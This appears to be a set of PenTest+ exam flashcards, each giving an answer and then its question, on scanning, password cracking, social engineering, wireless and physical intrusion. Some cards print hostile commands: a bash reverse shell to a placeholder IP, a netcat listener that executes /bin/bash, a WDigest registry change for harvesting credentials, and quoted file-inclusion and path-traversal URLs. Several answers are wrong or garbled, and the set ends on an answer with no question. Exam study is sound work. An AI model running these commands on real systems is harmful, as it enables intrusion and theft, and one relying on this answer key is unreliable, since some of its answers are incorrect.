Pentest+
-f
Which option causes nmap to scan using tiny, fragmented packets in an attempt to fool a packet filtering firewall?
-D
Which option causes nmap to send scans from a spoofed IP address?
-Tn
Which option is used with the nmap command to throttle vulnerability scan queries?
Dictionary attack
Which password-cracking method leverages wordlists that are expanded with discovered real-world passwords as they are discovered?
Rainbow tables
Which password-cracking method requires extensive storage capacity, sometimes more than 300 GB in total?
OWASP Testing Project
Which penetration testing methodology is focused on web application penetration testing?
White box
Which penetration testing methodology may require valid authentication credentials or other information granting intimate knowledge of an environment or network?
Management frame
Which type of primary frame (defined by the IEEE 802.11 wireless standard) enables stations to establish and sustain communication over the network with an access point?
Control frame
Which type of primary frame (defined by the IEEE 802.11 wireless standard) facilitates delivery of data frames to each station?
Script kiddies, or "skids"
Which type of threat actor is generally unskilled, is typically motivated by curiosity or personal profit, and is frequently indicated by the use of publicly available exploits?
Credentialed
Which type of vulnerability scan can usually identify the most vulnerabilities?
Discovery
Which type of vulnerability scan is least likely to be detected by an intrusion prevention system (IPS) or intrusion detection system (IDS)?
Full
Which type of vulnerability scan is more likely to be used by a defender rather than a penetration tester?
Full
Which type of vulnerability scan is most likely to be detected by an intrusion prevention system (IPS) or intrusion detection system (IDS)?
Discovery
Which type of vulnerability scan is the least intrusive on the target network?
Noncredentialed
Which type of vulnerability scan most closely approximates the perspective that an external hacker would have of the network?
Emergency fail open
Which of the following features of an egress sensor can be manipulated to allow a penetration tester to enter a building without authorization?
Unquoted service paths
Which of the following functionalities can an attacker abuse to try to elevate privileges if the service is running under SYSTEM privileges?
Dumpster diving
Which of the following involves an unauthorized individual searching and attempting to collect sensitive information from the trash?
Shoulder surfing
Which of the following involves obtaining information such as personally identifiable information (PII), passwords, and other confidential data by looking at someone's laptop, desktop, or mobile device screen?
XSD
Which of the following is a World Wide Web Consortium (W3C) specification that identifies how to define elements within an XML document?
Fuzzing
Which of the following is a black-box testing technique that consists of sending malformed/semi-malformed data injection in an automated fashion?
Dirbuster
Which of the following is a brute-force utility that can be used by penetration testers to discover directories and files on a web server?
PowerSploit
Which of the following is a collection of PowerShell modules that can be used for post-exploitation and other phases of an assessment?
Dynamic ARP inspection (DAI)
Which of the following is a common mitigation for ARP cache poisoning attacks?
CPassword
Which of the following is a component of Active Directory's Group Policy Preferences that allows administrators to set passwords via Group Policy?
Master service agreement (MSA)
Which of the following is a contract where both parties agree to most of the terms that will govern future agreements?
Admin passwords may be easily guessed. Admin passwords are almost guaranteed to be in any major wordlist used in dictionary attacks. Admin passwords will be found with a brief Internet search for the service in question.
Which of the following is a danger associated with the use of default authentication credentials on a system or service?
SOW
Which of the following is a document defined during the planning and scoping phase of a penetration test that identifies specific techniques, tools, activities, deliverables, and schedules for the test?
Statement of work (SOW)
Which of the following is a formal document that defines exactly what will be done during a penetration test?
MD5
Which of the following is a hashing algorithm that should be avoided?
Uncredentialed vulnerability scans are known to more commonly produce false positives.
Which of the following is a major benefit of running a credentialed vulnerability scan over a uncredentialed scan?
Implement DNSSEC.
Which of the following is a mechanism that can be used to defend against DNS poisoning attacks?
SOAP
Which of the following is a messaging protocol specification that defines how structured information can be exchanged between web applications and is created from WSDL files?
Replacing an older X-Frame-Options or CSP frame ancestors
Which of the following is a mitigation technique for preventing clickjacking attacks?
Swagger
Which of the following is a modern framework of API documentation and development and the basis of the OpenAPI Specification (OAS), which can be very useful for pen testers to get insights into an API?
Rainbow table
Which of the following is a precomputed list of hash values for common passwords that can be used for offline password file cracking?
Swagger
Which of the following is an open source framework designed to help developers design, build, document, and test Representational State Transfer (REST) web services?
Mimikatz
Which of the following is an open source tool that allows an attacker to retrieve user credential information from the targeted system and potentially perform pass-the-hash and pass-the-ticket attacks?
OpenVAS
Which of the following is an open source vulnerability scanner?
Nikto
Which of the following is an open source web vulnerability scanner?
Aircrack-ng
Which of the following is an open-source suite of tools useful for conducting RF communication monitoring and security testing of wireless networks?
theharvester
Which of the following is an open-source, Python-based tool that runs strictly from the standard user command line and includes both passive and active options for intelligence collection (numerous command-line switches enable or disable functionality such as limiting queries to a specific search engine or running searches for identified IP addresses and hostnames in Shodan)?
Unauthorized function or API use
Which of the following is best defined as a software vulnerability stemming from developer interfaces being left available to remote users, usually either unintentionally through a failure to disable the feature or intentionally as a backdoor or tool meant to make administration simpler?
Salting
Which of the following is commonly used to prevent precomputation attacks on hashed passwords by adding random bits to the hashing operation?
Key stretching
Which of the following is commonly used to prevent precomputation attacks on hashed passwords by running the value to be hashed through the hash function multiple times?
Thorough review of application code outside of a running system for details on the vulnerability
Which of the following is not a benefit of performing vulnerability scanning during a penetration test?
Exploits
Which of the following is not a commonly reported theme or issue in vulnerability scan results?
PoC exploit code
Which of the following is not a detail of CVEs maintained by the CVE Numbering Authority?
Posing as a representative of a company's IT department and convincing the COO to provide his VPN credentials over the phone
Which of the following is not a method of bypassing Network Access Control (NAC)?
A phishing campaign using whaling
Which of the following is not a motivation technique used by social engineers?
Layer Multi-Name Resolution (LLMNR)
Which of the following is not a name-to-IP address resolution technology or protocol?
PowerShell hash store
Which of the following is not a place where Windows stores password hashes?
Password is over 50 characters long with a large character set.
Which of the following is not a potential characteristic of weak authentication credentials?
Clickjacking
Which of the following is not a potential consequence of a lack of error handling or excessively verbose error handling in servers, web applications, and databases?
Beacon frame
Which of the following is not a primary type of frame defined by the IEEE 802.11 wireless communication standard?
The Japan Computer Emergency Response Team (JPCERT)
Which of the following is not a publicly accessible list used for vulnerability research and analysis?
Programming concepts
Which of the following is not a security weakness category as maintained by CWE?
SQLmap
Which of the following is not a tool that can be used to enumerate the available ports and protocols opened on a victim system?
Nmap
Which of the following is not a tool that is commonly used for passive reconnaissance?
IDA
Which of the following is not a vulnerability scanner commonly used in penetration testing?
Selecting targets by running Nmap or a similar scanner
Which of the following is not an element of pre-engagement tasks?
Linux servers
Which of the following is not an example of a nontraditional asset?
REST
Which of the following is not an example of an HTTP method?
HIPAA
Which of the following is not an example of regulations or regulatory bodies applicable to the financial sector?
Windows PowerSploit
Which of the following is not an insecure service or protocol?
The public reputation of the developers of the software or operating system being tested
Which of the following is not an issue to consider when performing a vulnerability scan?
Nessus
Which of the following is not an open source intelligence (OSINT) gathering tool?
Cross-site request forgery (CSRF)
Which of the following is not one of the top mobile security threats and vulnerabilities?
USB key drop attacks are not effective anymore.
Which of the following is not true about USB key drop attacks?
CSRF attacks typically affect applications (or websites) that rely on digital certificates that have been expired or forged.
Which of the following is not true about cross-site request forgery (CSRF or XSRF) attacks?
An interrogator cannot use closed-ended questions to gain more control of the conversation.
Which of the following is not true about elicitation and interrogation?
Pharming can be done by exploiting a buffer overflow using Windows PowerShell.
Which of the following is not true about pharming?
-oX
Which option causes nmap to save its output to an XML-formatted text file in the file system of the host where it was run?
-F
Which option causes nmap to scan a host for the 100 most commonly used IP ports, such as 20, 21, 23, 25, 53, 80, etc.?
-iR
Which option causes nmap to scan a specified number of random hosts?
Credentialed
Which type of vulnerability scan most closely approximates the perspective that an internal system administrator would have of the network?
Full
Which type of vulnerability scan produces the most accurate results?
Stealth
Which type of vulnerability scan sends SYN packets to network hosts to enumerate them?
Noncredentialed
Which type of vulnerability scan usually identifies the least number of vulnerabilities?
HTTP parameter pollution
Which type of web application test attempts to provoke unexpected responses by feeding arbitrary values into web page parameters?
VOIP phones SCADA devices
Which types of network devices are commonly whitelisted in many NAC implementations? (Choose two.)
SET
Which utility is used to conduct social engineering exploits?
Fragmentation attack
Which wireless encryption key cracking exploit involves extracting a small amount of keying material from captured wireless packets and then sending ARP frames to the access point?
Credential harvesting
Which wireless exploit could be carried out by creating a fake captive portal for a wireless network that captures victims' usernames and passwords?
Bluesnarfing
Which wireless exploit involves creating an unauthorized connection with a Bluetooth device, such as a mobile phone, and stealing information from it?
Bluejacking
Which wireless exploit involves sending unsolicited messages over a Bluetooth connection to a wireless device?
WPS cracking
Which wireless exploit involves using a brute-force attack to crack an eight-digit pin?
Jamming attack
Which wireless exploit is more of a stress test designed to prevent users from being able to use a wireless network?
Karma attack
Which wireless exploit uses a special wireless device to listen for SSID requests from other wireless devices and then impersonate the requested access point?
Filtered
When running an Nmap SYN scan, what will be the Nmap result if ports on the target device do not respond?
-eq
As a part of a gray box penetration test, you need to create a PowerShell script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables to test whether they are equal. Which relational operator should you use?
Authority
A penetration tester sends a spear phishing email to an employee of the target organization, claiming to be the director of operations. The email asks the employee to reply with sensitive internal information. What motivation factor did the penetration tester use in this scenario?
Man-in-the-middle
A replay attack is commonly categorized as which type of exploit?
Hyper-V Active Directory Federation Services
A Windows server is functioning as an Active Directory domain controller for an organization's network. Which of the following services are not required for it to fulfill this role? (Choose two.)
Compliance
A _______ vulnerability scan would typically be focused on a specific set of requirements.
Gray
A ________-box test is a test in which the penetration tester is given some information about the target but not all information.
It may be illegal to transport some penetration testing software and hardware internationally.
A client has asked you to run a white box penetration test. Her organization has offices in the United Kingdom, Saudi Arabia, Pakistan, and Hong Kong. You load your penetration testing toolkit onto your laptop and travel to each office to run the assessment on-site. What did you do incorrectly in this scenario?
Screenshots of exploitation or vulnerabilities
When detailing findings in a penetration test report, which of the following can serve as evidence for the purpose of attestation? (Choose all that apply.)
No, it is legal to transport most penetration testing software into these countries.
A client has asked you to run a white box penetration test. Her organization has offices in the United States, Indonesia, Thailand, and Singapore. To avoid international transportation of your penetration testing software, you upload it to your Google Drive account. Then you travel to each site, download the software, and run it locally on your laptop. Did you handle your penetration testing software appropriately in this scenario?
Software Development Kit (SDK) documentation Application Programming Interface (API) documentation
A client has asked you to run a white box penetration test. The goal is to assess the security of several PC applications that were written in-house using the C++ programming language. These applications are used on a day-to-day basis by employees to manage orders, inventory, and payouts. During the scoping process, you determine that it would be helpful if you had access to the organization's internal software development documentation for these applications. Which of the following should you ask your client for? (Choose two.)
Web Application Description Language (WADL) documentation
A client has asked you to run a white box penetration test. The goal is to assess the security of their web-based applications. These applications are based on Representational State Transfer (REST) architecture. During the scoping process, you determine that it would be helpful if you had access to the organization's internal documentation for these applications. Which of the following should you ask your client for?
Web Services Description Language (WSDL) documentation
A client has asked you to run a white box penetration test. The goal is to assess the security of their web-based applications. These applications leverage the Simple Object Access Protocol (SOAP). During the scoping process, you determine that it would be helpful if you had access to the organization's internal documentation for these applications. Which of the following should you ask your client for?
Compliance
A client has hired you to perform a PCI-DSS penetration test. What kind of vulnerability scan would you likely perform during this test?
Goal-based
A client has hired you to test the physical security of their facility. They have given you free rein to try to penetrate their facility using whatever method you want as long as it doesn't harm anyone or damage the property. What type of assessment is being conducted in this scenario?
Advanced persistent threat (APT) actors
A client has recently come to you voicing concern over a large number of companies being compromised by remote attackers who are looking for trade secrets. What best describes the types of adversaries that would be looking for trade secrets?
Testing should focus on the discovery of potential security issues through all in-scope systems, not just on determining the effectiveness of active defenses such as the IPS.
A client has requested an external network penetration test, but during the discussion between the penetration tester and the client, the client is reluctant to add the tester's source IP address to their IPS whitelist for the duration of the test. Which argument best describes why the tester's source IP address should be on the client's IPS whitelist?
The bands and frequencies of the wireless devices used by the client
A client has requested that a wireless penetration test be done. Which scoping target information will most likely be needed before testing can start?
Insider threat
A company has been hacked, and several e-mails that are embarrassing to the CFO and potentially indicative of criminal activity on their part have been leaked to the press. Incident response has determined that only three user accounts accessed the organization's mail server in the 24 hours immediately preceding the disclosure. One of these accounts was assigned to an employee who was fired two weeks before the incident. No other access to the system has been found by incident response. What type of threat actor should be considered a likely culprit for this breach first?
Maltego
A consultant has been hired by an organization to perform a black box penetration test. She has used a variety of tools to gather OSINT about the target information. Her efforts have been very successful. In fact, she has gathered so much information that she is having a hard time organizing it into a format that she can use efficiently. Which tool could she use to organize the information that she has gathered?
Shodan
A consultant has been hired by an organization to perform a black box penetration test. She knows that Internet of Things (IoT) devices frequently employ weak security mechanisms that a penetration tester can exploit. She wants to discover whether the target organization has any of these devices deployed. Which utility could she use to do this?
nmap
A consultant has been hired by an organization to perform a black box penetration test. She wants to perform a detailed scan of the target organization's public-facing web server to see what she can learn. Which utility should she use to accomplish this?
Gray box assessment
A consultant has been hired by an organization to perform a penetration test. The target of the test is the organization's HR database application. The tester has been given a desk, a computer connected to the organization's network, and a network diagram. However, the tester has not been given any authentication credentials. What type of test is being conducted in this scenario?
Black box assessment
A consultant has been hired by an organization to perform a penetration test. The target of the test is the organization's e-commerce website. The tester, located in a different city, will utilize several different penetration testing tools to analyze the site and attack it. The tester does not have any information about the site or any authentication credentials. What type of test is being conducted in this scenario?
White box assessment
A consultant has been hired by an organization to perform a penetration test. The target of the test is the organization's internal firewalls. The tester has been given a desk, a computer connected to the organization's network, and a network diagram. The tester has also been given authentication credentials with a fairly high level of access. What type of test is being conducted in this scenario?
Compliance-based assessment
A consultant has been hired to perform a penetration test for an organization in the healthcare industry. The target of the test is a public-facing self-service website that users can access to view their health records. The aim is to circumvent security measures and gain unauthorized access to this information. What type of assessment is being conducted in this scenario?
White box assessment
A consultant has been hired to perform a penetration test for an organization in the healthcare industry. The target of the test is a public-facing self-service website that users can access to view their health records. The penetration tester has been given full knowledge of the organization's underlying network. What type of test is being conducted in this example?
Red team assessment
A consultant has been hired to perform a penetration test for an organization. The target of the test is the organization's proprietary design documents. The aim is to circumvent security measures and gain unauthorized access to these documents. What type of assessment is being conducted in this scenario?
Government restriction
A defense contractor that manufactures hardware for the U.S. military has put out a request for proposal for penetration tests of a new avionics system. The contractor indicated that penetration testers for this project must hold a security clearance. Which of the following is the most likely explanation for this requirement?
It's an active scanning technique. It performs a simple ping test to determine if a host is up and alive on the network.
A discovery scan in nmap is described by which of the following statements? (Choose two.)
Organized crime
A group of hackers located in a former Soviet-bloc nation have banded together and released a ransomware app on the Internet. Their goal is to extort money in the form of crypto currency from their victims. What kind of attacker is this?
Impersonation
A help desk technician receives a phone call from someone claiming to be an employee. This person has been locked out of an account and is requesting assistance to unlock it. The help desk asks for proof of identity before access will be granted. What type of attack was the caller trying to perform?
The technician should request that management create a request for proposal (RFP) to begin a formal engagement with a professional penetration testing company.
A junior technician in an organization's IT department runs a penetration test on a corporate web application. During testing, the technician discovers that the application can disclose a SQL table with all user account and password information. How should the technician notify management?
Statement of work
When finalizing a penetration test report prior to delivery to a client, which document should be consulted to ensure that all acceptance criteria are being met?
No, you should have spent more time understanding the target audience before scoping the assessment.
A new client calls to schedule a gray box penetration test. You gather some basic information about the client over the phone, put together a scope for the test, and create a schedule for the test. You then hire several contractors to help conduct the test and begin the assessment on the scheduled date. Did you scope this assessment properly?
JTAG debug exploit
A penetration tester connects a special device to a diagnostic port implemented in the motherboard by the manufacturer and is able to capture data from system registers. What type of exploit occurred in this scenario?
Tailgating
A penetration tester enters the target organization's physical facility by striking up a conversation with an employee in the parking lot and walking with her through a door that uses a proximity badge reader to control access. The employee uses her badge to open the door and holds it open for the penetration tester. What is this technique called?
Piggybacking
A penetration tester enters the target organization's physical facility by walking behind an employee and grabbing the authentication-protected door before it shuts all of the way. What is this technique called?
Advanced persistent threat (APT)
A penetration tester has been asked by a client to imitate a recently laid-off help desk technician. What best describes the abilities of a threat actor?
Static code analysis
A penetration tester has been asked by a client to perform a code review of a web application. What type of analysis is the penetration tester performing?
TCP SYN flood
A penetration tester has been asked by a client to review a new web application for availability. Which of the following types of attacks should the tester utilize?
Badge cloning
A penetration tester has been asked to assess a client's physical security by gaining access to its corporate office. The tester is looking for a method that will allow him to enter the building during both business hours and after hours. What would be the most effective method for the tester to attempt?
A discovery scan
A penetration tester has been asked to determine whether the client's server farm is compliant with the company's software baseline by conducting a remote scan. What type of scan should the tester perform to verify compliance?
Limited network access Storage access
A penetration tester has completed a simple compliance scan of a client's network. The results indicate that there is a subset of assets on a network. This information differs from what was shown on the network architecture diagram that was given to the tester prior to testing. What is most likely the cause for the discrepancy? (Choose two.)
Begin an SNMP password brute-force attack
A penetration tester has discovered a Supervisory Control and Data Acquisition (SCADA) device in one of the VLANs in scope. What action best creates a potentially damaging outcome against the device?
By attempting privilege escalation attacks
A penetration tester has found a few unquoted service paths during a test of a client's network. How can the tester use these vulnerabilities to his advantage?
dsquery user -inactive 4
A penetration tester has full access to a domain controller and wants to discover any user accounts that have not been active for the past 30 days. What command should the penetration tester use?
Disable the unneeded services.
A penetration tester has performed a security assessment for a client. It is observed that there are several high-numbered ports listening in on a public web server. The client indicates that they are only using port 443 for an application. What should the tester recommend to the client?
Correct the most critical vulnerability first, even if it means that fixing the other vulnerabilities may take longer to correct.
A penetration tester has performed a security assessment for a client. The report lists a total of nine vulnerabilities, with four of those determined to be critical. The client does not have the budget to immediately correct all of the vulnerabilities. What should the tester suggest is the best option for the client given these circumstances?
Use a blacklist validation for the SQL statements. Use a whitelist validation for the SQL statements.
A penetration tester has recently finished a test that revealed that a legacy web application is vulnerable to SQL injections. The client indicates that remediating the vulnerability would require an architectural change and that management does not want to risk anything happening to the current application. Which of the following conditions would minimize the SQL injection risk while providing a low-effort and short-term solution? (Choose two.)
ADMIN$ and SERVICES
A penetration tester has successfully captured the administrator credentials of a remote Windows machine. The tester is now attempting to access the system by using PsExec. However, the tester is denied permission. What shares must be accessible for a successful PsExec connection?
Secure Shell (SSH) Wireshark
A penetration tester has successfully exploited a DM2 server that seems to be listening to an outbound port. The tester wants to forward that traffic back to a device. What are the best tools to do this? (Choose two.)
$ history -c
A penetration tester has successfully exploited an application vulnerability and now needs to remove the command history from the Linux session. Which command will remove the command history?
A spear phishing attack
A penetration tester has used Social Engineer Toolkit (SET) to make a copy of a company's cloud-hosted web mail portal and then sends an email to try to obtain the CEO's login credentials. This is an example of what type of attack?
Lock bypass
A penetration tester impersonates a heating and cooling repair person to gain physical access to the target organization's facility. Once inside, she requests access to the server room to investigate a problem with the cold air return. As she is leaving the server room, she surreptitiously places a piece of strong tape over the door locking tab, allowing her to return into the room later without authorization. What is this technique called?
Lock bypass
A penetration tester impersonates a heating and cooling repair person to gain physical access to the target organization's facility. Once inside, she requests access to the server room to investigate a problem with the cold air return. As she is leaving the server room, she surreptitiously places a small wooden wedge into the door jam, preventing the door from closing completely. This allows her to return into the room later without authorization. What is this technique called?
Repeating attack
A penetration tester impersonates a vending machine repair person to gain access to the target organization's facility. While inside, the tester hides a wireless device behind a vending machine that captures the organization's wireless network radio signal and rebroadcasts it with high gain towards the parking lot. Which wireless exploit did the tester employ in this scenario?
Lock picking
A penetration tester impersonates a vending machine repair person to gain physical access to the target organization's facility. Once inside, he notices that the door to the server room uses a simple pushbutton door lock that doesn't use any kind of electronic authentication. Which physical security attack could he use to gain access to the server room?
Lock bypass
A penetration tester is attempting a physical security assessment and wants to use an "under-the-door tool" during the test. Which of the following intrusion techniques should the tester attempt?
The MAC address of the gateway
A penetration tester is conducting ARP spoofing against a switch. Which of the following should the tester trick to get the most information?
DNS cache poisoning
A penetration tester is conducting a gray box penetration test. She crafts a Trojan horse exploit that flushes the DNS cache on the local workstation and replaces it with malicious name resolution entries that point to a fake web server. When clients within the organization try to resolve hostnames, the malicious entries from the local DNS cache are used. What is this exploit called?
DNS cache poisoning
A penetration tester is conducting a gray box penetration test. She notices that one of the branch offices of the organization uses a caching-only DNS server to handle name resolution requests. She sends a bogus reply to a name resolution request from the caching-only DNS server, using a spoofed source address in the reply packets. The bogus name resolution records point users to a fake web server that is used to harvest authentication credentials. What is this exploit called?
Stored cross-site scripting (XSS)
A penetration tester is conducting a scan of a web application. During the review of the scan results, which of the following vulnerabilities would be the most critical and should be prioritized for exploitation?
bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1
A penetration tester is conducting a test and gains access into an unrestricted system network by using port 443. The tester wants to create a reverse shell from the client back to the tester. Which of the following methods is most likely what the tester will use?
nc -lp 4444 -e /bin/bash
A penetration tester is conducting a test and has compromised the client's host. What is the correct syntax to create a Netcat listener on this device?
The HTTP POST method
A penetration tester is conducting a test on a web application and discovers that the user login process sends FROM field data by using the HTTP GET method. To reduce the risk of exposing sensitive data, the HTML form should be sent by using which of the following?
For all logons, require multifactor authentication. Increase minimum password complexity requirements. On every workstation, enable full-disk encryption.
A penetration tester is conducting a test, and after compromising a single workstation, the tester is able to maneuver laterally throughout the domain with very few roadblocks. Which migration strategies should be recommended for the report to the client? (Choose three.)
The statement of work (SOW)
A penetration tester is currently in the middle of a test when the client asks the tester to add more addresses. Which of the following defines the target list that the tester can follow?
Open source intelligence (OSINT)
A penetration tester is in the middle of a penetration test and is gathering information without actively scanning the client. What type of information is being gathered?
Scope creep
A penetration tester is in the middle of conducting a penetration test specifically scoped to a single web application. The tester learns that the web server also contains a list of passwords to other servers at the target location. The tester notifies the client. The client then asks the tester to validate those servers. What has occurred once the tester proceeds with testing the passwords against the other servers?
A deauthentication attack
A penetration tester is monitoring a WPA2-PSK secured wireless network and is attempting to capture a handshake between a client and an access point. Even though the tester is monitoring the correct channel, he has been unsuccessful. Which type of attack would help the tester to obtain the handshake?
NetBIOS
A penetration tester is performing a gray box test for a client. During a network scan, she notices a host that has TCP port 139 open. She suspects this is a Windows system, so she runs the NBTSTAT command and discovers key information about the host. Which protocol on the remote host allowed the tester to gather this information?
SQLmap
A penetration tester is performing a gray box test for a client. The tester decides to run a brute-force attack against a SQL database. Which utility could be used to do this?
Mimikatz
A penetration tester is performing a gray box test for a client. The tester wants to try to generate a Kerberos "golden ticket" to compromise services within the target Active Directory domain. Which utility could be used to do this?
Swagger
A penetration tester is preparing to conduct API testing. Which of the following would be the most beneficial when preparing for this engagement?
Provides extended site validation
A security administrator is trying to encrypt communication by using the Subject Alternative Name (SAN) attribute of a certificate. What is a reason why the administrator should take advantage of SAN?
reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogoCredential /t REG_DWORD /d 1
A penetration tester is running a phishing test and receives a shell from an internal computer that is running the Windows 10 operating system. The tester decides that he wants to use Mimikatz to perform credential harvesting. The tester wants to allow for credential caching. Which of the following registry changes would allow this?
Conduct a LLMNR/NETBIOS-NS query.
A penetration tester is testing the penetration of a client's network and managed to obtain access to a laptop. What would be the tester's next step to obtain credentials from the laptop?
Local file inclusion Remote file inclusion
A penetration tester is trying to exploit a web application used by the target organization. He uses a form field in the web application to upload a malicious executable to the web server. Which of the following describe this kind of exploit? (Choose two.)
use auxiliary/server/socks4a
A penetration tester is using Metasploit. What command would allow the tester to access a private network from the Internet?
-T4
A penetration tester is using nmap to scan hosts on the target network. The client has a lax security posture and employs a relatively inexperienced IT staff. Which timing option could she consider using with nmap to speed up her scans?
-T1
A penetration tester is using nmap to scan hosts on the target network. The client uses an aggressive IPS tool and employs an experienced IT staff that she needs to avoid. Which timing option should she use with nmap to avoid detection? (Assume that time is not an issue.)
Dictionary attack
A penetration tester is using social media to gather information about different employees at a company. The tester has created a list of popular words used frequently in the employee's profiles. What type of attack could this information be used for?
Executive summary
A penetration tester is writing a report that outlines the overall level of risk to operations. In which part of the report should the tester include this information?
RFID cloning
A penetration tester learns that the target organization's employees use RFID access badges to unlock doors within the facility. She identifies a restaurant where employees of the organization commonly gather for lunch. The next day, she sits at a table near a group of employees in the restaurant with a small, hidden RFID reader. She captures the RFID signature from the employees' badges and then creates fake access badges using the RFID signatures. What is this technique called?
Piggybacking
A penetration tester observes that many employees of the target organization congregate outside the back door of the facility at 10 a.m. and 2 p.m. to smoke cigarettes. The next day, the tester joins the group and pretends to smoke with them. When the group finishes smoking, the tester walks through the back door behind the group. What is this technique called?
Dumpster diving
A penetration tester observes that the target organization's garbage is picked up early in the morning every Tuesday. Late Monday night, she climbs into the organization's garbage receptacle and gathers discarded documents, optical discs, and storage devices such as flash drives. What kind of exploit occurred in this scenario?
Credential brute-forcing
A penetration tester reviews social media accounts owned by the target organization's CIO and makes a list of possible passwords such as her spouse's name, pet's name, favorite sports teams, and so on. The tester tries to log on to the CIO's account using one possible password after another, trying to find one that works. What type of authentication exploit is this?
Dumpster diving
A penetration tester rifles through the target organization's garbage and finds an optical disc. He reads the disc on his laptop and finds that it contains several very sensitive files from human resources. What kind of exploit occurred in this scenario?
Dumpster diving Badge cloning
A penetration tester rummages through the target organization's garbage and finds a discarded access badge. She replicates a new badge with her picture using the discarded badge as a model. She uses a device to read the discarded badge's magnetic stripe and replicate it on the fake badge. Which techniques were used by the tester in this scenario? (Choose two.)
-T3
A penetration tester runs an nmap scan without specifying a timing option. Which one is used by default?
To remove the persistence
A penetration tester runs the chkconfig --del <servicename> command at the end of an engagement. What is the reason the tester may have done this?
Upgrading the shell
A penetration tester runs the following from an exploited machine: python -c 'import pty; pty.spawn("/bin/bash")' What action is the tester performing?
Scarcity
A penetration tester sends a phishing email to the employees of the target organization. The email purports to be offering iPads for an absurdly low price. However, there are only 25 left at this price. The link in the email leads to a fake website that uses a drive-by-download script that drops a keylogger on the employee's computer. What motivation factor did the penetration tester use in this scenario?
Social proof
A penetration tester sends a phishing email to the employees of the target organization. The link in the email leads to a fake website that lists more than 1,000 reviews with an average rating of 4.9 stars. What motivation factor did the penetration tester use in this scenario?
Urgency
A penetration tester sends a spear phishing email to an employee of the target organization, claiming to be a fellow employee who has forgotten her password. The email indicates she has a presentation in a few minutes and can't access her presentation files on a shared network drive. She asks the employee to "loan" her his username and password so she can log on and get the files. What motivation factor did the penetration tester use in this scenario?
Authority
A penetration tester sends a spear phishing email to an employee of the target organization, claiming to be an agent with the Federal Bureau of Investigations (FBI). The email indicates that the employee's manager is being investigated for embezzlement and asks the employee to reply with sensitive internal information. What motivation factor did the penetration tester use in this scenario?
Authority
A penetration tester sends an email to a sales rep of the target organization, claiming to be the CEO of one of the organization's most important clients. The email asks the employee to create a VPN account to allow the CEO access to certain files on the organization's network. The email threatens to terminate the business relationship if this doesn't happen. What motivation factor did the penetration tester use in this scenario?
Urgency
A penetration tester sends an email to an employee of the target organization, claiming to be a sales rep on the road. She claims in the email that her VPN connection from her hotel is running extremely slow and that she can't access her client's data. If she doesn't get the data, she will lose the sale. The message asks the employee to email her a copy of the files. What motivation factor did the penetration tester use in this scenario?
Social proof Urgency
A penetration tester sends email to an employee of the target organization, claiming to be a sales rep on the road. She claims in the email that she forgot her VPN password and now it is locked because she tried too many wrong ones. She asks the employee for his VPN username and password so she can log on and update the customer database with a huge new order. She mentions in the email that one of the target employee's coworkers has done this for her in the past and it wasn't a big deal. What motivation factors did the penetration tester use in this scenario? (Choose two.)
Report any critical findings. Report indicators of compromise. Report a server that becomes unresponsive.
A penetration tester should have a customer's contact information available at all times. Which of the following should penetration testers immediately report to their client? (Choose three.)
Gray box
A penetration tester uses a typical employee email account to send a phishing email exploit to managers and executives within the target organization. The goal is to see how many actually fall for the exploit and click the link in the message. What kind of penetration test is being performed in this scenario?
-sS
A penetration tester uses the nmap utility to send a TCP SYN packet to a target host. The target host responds with a SYN ACK packet, but instead of finishing the connection, nmap sends a reset packet to the target host. Which option did the tester use with the nmap command?
Tailgating
A penetration tester waits in the target organization's parking lot early in the morning until she sees an employee heading toward the front door. She walks up behind the employee while clumsily carrying several large boxes. She asks the employee to hold the door for her and is able to enter the facility. What is this technique called?
Piggybacking
A penetration tester waits in the target organization's parking lot until she sees a large group of employees returning from lunch. She inserts herself quietly at the back of the group. The first person in the group uses his badge to unlock a secured door. The penetration tester is able to move through the door with the rest of the group. What is this technique called?
Maltego Shodan
A penetration tester wants to conduct open-source intelligence (OSINT) data collection from publicly available sources. Which of the following tools can be used? (Choose two.)
Hydra
A penetration tester wants to perform a credential brute-force attack on a client's application. Which of the following tools should be used?
Shodan
A penetration tester wants to perform passive reconnaissance on the client's external domain. What would be the best choice to use?
nmap 192.168.1.0/24 -Pn
A penetration tester wants to run a port scan on all hosts on the 192.168.1.0 subnet (with a subnet mask of 255.255.255.0) without actually discovering the hosts first. Which command should she use?
responder
A penetration tester wants to target the NetBIOS name service. Which command is most likely to be used to exploit the NetBIOS name service?
msfconsole
A penetration tester wants to use Metasploit. Which of the following commands will start the Metasploit database?
By comparing hashes to identify known values
A penetration tester wants to use rainbow tables against a password file that has been captured. How does the rainbow table crack passwords?
-iL -sV
A penetration tester, using nmap, has been asked to conduct OS fingerprinting using a company-provided text file that contains a list of all the IP addresses. What switches would you need to include in your code to conduct OS fingerprinting using the text file? (Choose two.)
Discovery
A ping sweep is an example of which type of vulnerability scan?
Advanced persistent threat
A red team assessment is typically conducted in a manner consistent with what type of threat actor?
Samples of the Simple Object Access Protocol (SOAP) project files
A security analyst is attempting to construct specialized XML files to test the security of the parsing functions of a Windows application during testing. Before starting to test the application, which of the following should the analyst request from the client?
Passive scan
A security analyst is attempting to identify vulnerabilities in a customer's web application without affecting the system or its data. Which of the following best describes the type of vulnerability scanning being performed?
Block URL redirections.
A security analyst is monitoring the Web Application Firewall (WAF) logs and has discovered that there was a successful attack against the following URL: https://sample.com/index.php?Phone=http://iattackedyou.com/stuffhappens/revshell.php. What remediation steps should be taken to prevent this type of attack from happening again?
Nothing; they must do their own discovery.
A security analyst is planning on using black box penetration testing. This type of strategy will provide the tester with which of the following?
Directory traversal
A security analyst is reviewing the logs for a web application. The analyst finds a suspicious request. The request shows the following URL: http://www.companysite .com/about.php?i=../../../etc/passwd. What is this request attempting?
Rules of engagement (RoE)
A security analyst receives an outline of the scope of an upcoming penetration test. This document contains the times that each can be scanned as well as the IP addresses. What document would contain this information?
-sS, SYN and RST packets
A stealth scan in nmap is denoted by the __________ flag and leverages the use of __________ when probing ports.
To provide API descriptions and test cases
A swagger document is intended to serve what purpose?
High
A system under test is determined to be running an insecure protocol. What severity level would you give this finding if the device were connected to the Internet?
Fence jumping
A target organization's facility is surrounded by a tall chain-link fence topped with barbed wire. A penetration tester observes that a remote section of the fence is overgrown with shrubbery. Late at night, she uses bolt cutters to cut a slit in the fence that she can slip through at a later time. What is this technique called?
Red team penetration test
